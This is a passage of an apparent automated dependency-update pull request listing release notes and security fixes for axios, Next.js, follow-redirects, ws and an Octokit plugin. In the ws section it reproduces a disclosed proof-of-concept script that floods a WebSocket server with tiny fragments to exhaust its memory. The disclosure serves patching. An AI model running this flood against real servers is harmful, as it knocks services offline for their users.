Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003ch2\u003ev1.15.1 - April 19, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/582934382e4e0e0bcb679c628071a4203e93cf57\"\u003e\u003ccode\u003e5829343\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.2 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10789\"\u003e#10789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4709a48fa2717ba97f43f5432d48ca4e26c2d326\"\u003e\u003ccode\u003e4709a48\u003c/code\u003e\u003c/a\u003e fix: added fix for memory leak in sockets (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/be3336014e01f9a4fc1f8aef15303cf7daaf58db\"\u003e\u003ccode\u003ebe33360\u003c/code\u003e\u003c/a\u003e chore: update changelog (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa\"\u003e\u003ccode\u003e4791514\u003c/code\u003e\u003c/a\u003e fix: more header pollutions (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/6feafcff6c2dbafe206161c5d09e38e1d36af66f\"\u003e\u003ccode\u003e6feafcf\u003c/code\u003e\u003c/a\u003e fix: socket issue (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/302e2739c602f00e323d4f3f5c79500647633a73\"\u003e\u003ccode\u003e302e273\u003c/code\u003e\u003c/a\u003e docs: update docs, add a couple actions etc (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ac42446be51300fe214ba3c6e40cc95f34fd6871\"\u003e\u003ccode\u003eac42446\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10767\"\u003e#10767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/908f2206b6bfeff67236784abce85935698ac1d9\"\u003e\u003ccode\u003e908f220\u003c/code\u003e\u003c/a\u003e docs: update threatmodel (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10765\"\u003e#10765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f93f8155250c2e066205521eda05ae22983a1f6d\"\u003e\u003ccode\u003ef93f815\u003c/code\u003e\u003c/a\u003e docs: added docs around potential decompressions bomb (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10763\"\u003e#10763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/1728aa1b15b8857f970611fd8983c06b423fc486\"\u003e\u003ccode\u003e1728aa1\u003c/code\u003e\u003c/a\u003e fix: short-circuits on any truthy non-boolean in withXSRFToken (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.14.0...v1.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 16.2.2 to 16.2.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev16.2.6\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - \u003cstrong\u003eIncomplete Fix Follow-Up\u003c/strong\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eModerate:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eLow:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: preserve HTTP access fallbacks during prerender recovery (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92231\"\u003e#92231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix fallback route params case in app-page handler (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91737\"\u003e#91737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix invalid HTML response for route-level RSC requests in deployment adapter (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91541\"\u003e#91541\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePatch setHeader for direct route handlers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93101\"\u003e#93101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude deployment id in \u003ccode\u003ecacheHandlers\u003c/code\u003e keys (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93453\"\u003e#93453\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix double-encoding of URL pathname parts in client param parsing (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93491\"\u003e#93491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev16.2.5\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ee6e79b1792a4d401ddf2480f40a83549fe8e722\"\u003e\u003ccode\u003eee6e79b\u003c/code\u003e\u003c/a\u003e v16.2.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/afa053d9eb9c2a68c7eba43e84fe6bed8babcd45\"\u003e\u003ccode\u003eafa053d\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/97a154e5bbee0cb1ac3fb8aa4db66ac36e796e3d\"\u003e\u003ccode\u003e97a154e\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/83899bc89103d4df1479e065c7c1e09d4698a7b6\"\u003e\u003ccode\u003e83899bc\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/7b222b90954d607fc28a34e9b360a9b1636bc206\"\u003e\u003ccode\u003e7b222b9\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93595\"\u003e#93595\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/a8dc24f1fe23d4a22d24fac734837f7c824138f7\"\u003e\u003ccode\u003ea8dc24f\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93587\"\u003e#93587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/766148f9cd48c0e218acafcd0f15defc14871bf4\"\u003e\u003ccode\u003e766148f\u003c/code\u003e\u003c/a\u003e v16.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/0dd94836a8b43209fcfefa448c141683c22c1a27\"\u003e\u003ccode\u003e0dd9483\u003c/code\u003e\u003c/a\u003e fix: add explicit checks for RSC header (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/83\"\u003e#83\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/98\"\u003e#98\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/d166096c399c4fc4e09cd2d1bf26dca6579a855d\"\u003e\u003ccode\u003ed166096\u003c/code\u003e\u003c/a\u003e fix proxy matching for segment prefetch URLs (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/89\"\u003e#89\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/96\"\u003e#96\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9d50c0b7190f59c470308578e12882788819f14c\"\u003e\u003ccode\u003e9d50c0b\u003c/code\u003e\u003c/a\u003e Strip next-resume header from incoming requests (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92\"\u003e#92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v16.2.2...v16.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 8.20.0 to 8.21.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.21.0\u003c/h2\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eIntroduced the \u003ccode\u003emaxBufferedChunks\u003c/code\u003e and \u003ccode\u003emaxFragments\u003c/code\u003e options (2b2abd45).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a remote memory exhaustion DoS vulnerability (2b2abd45).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eA high volume of tiny fragments and data chunks could be sent by a peer, using\nmodest network traffic, to crash a \u003ccode\u003ews\u003c/code\u003e server or client due to OOM.\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { WebSocket, WebSocketServer } from 'ws';\r\n\u003cp\u003econst wss = new WebSocketServer({ port: 0 }, function () {\nconst data = Buffer.alloc(1);\nconst options = { fin: false };\nconst { port } = wss.address();\nconst ws = new WebSocket(\u003ccode\u003ews://localhost:${port}\u003c/code\u003e);\u003c/p\u003e\n\u003cp\u003ews.on('open', function () {\n(function send() {\nws.send(data, options, function (err) {\nif (err) return;\nsend();\n});\n})();\n});\u003c/p\u003e\n\u003cp\u003ews.on('error', console.error);\nws.on('close', function (code, reason) {\nconsole.log(\u003ccode\u003eclient close - code: ${code} reason: ${reason.toString()}\u003c/code\u003e);\n});\n});\u003c/p\u003e\n\u003cp\u003ewss.on('connection', function (ws) {\nws.on('error', console.error);\nws.on('close', function (code, reason) {\nconsole.log(\u003ccode\u003eserver close - code: ${code} reason: ${reason.toString()}\u003c/code\u003e);\n});\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eThe vulnerability was responsibly disclosed and fixed by \u003ca href=\"https://github.com/Nadav0077\"\u003eNadav Magier\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eIn vulnerable versions, the issue can be mitigated by lowering the value of the\n\u003ccode\u003emaxPayload\u003c/code\u003e option if possible.\u003c/p\u003e\n\u003ch2\u003e8.20.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94\"\u003e\u003ccode\u003ebca91ad\u003c/code\u003e\u003c/a\u003e [dist] 8.21.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/2b2abd458a1b647d0b6033bd62a619c36189839a\"\u003e\u003ccode\u003e2b2abd4\u003c/code\u003e\u003c/a\u003e [security] Limit retained message parts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/78eabe2a6677b231bf9c82601bde86ff91639490\"\u003e\u003ccode\u003e78eabe2\u003c/code\u003e\u003c/a\u003e [security] Add latest vulnerability to SECURITY.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5d9b316230ea931532a6671cc450f18c11edd02f\"\u003e\u003ccode\u003e5d9b316\u003c/code\u003e\u003c/a\u003e [dist] 8.20.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086\"\u003e\u003ccode\u003ec0327ec\u003c/code\u003e\u003c/a\u003e [security] Fix uninitialized memory disclosure in \u003ccode\u003ewebsocket.close()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/ce2a3d62437995a47e6056d485a33d21b6a8f867\"\u003e\u003ccode\u003ece2a3d6\u003c/code\u003e\u003c/a\u003e [ci] Test on node 26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/58e45b872bb0f35a3edd553c27e105300a4f5bd0\"\u003e\u003ccode\u003e58e45b8\u003c/code\u003e\u003c/a\u003e [ci] Do not test on node 25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5f26c245231a4b018479a9269e8c3da4773fe42f\"\u003e\u003ccode\u003e5f26c24\u003c/code\u003e\u003c/a\u003e [ci] Run the lint step on node 24\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/websockets/ws/compare/8.20.0...8.21.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e@​octokit/plugin-paginate-rest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET 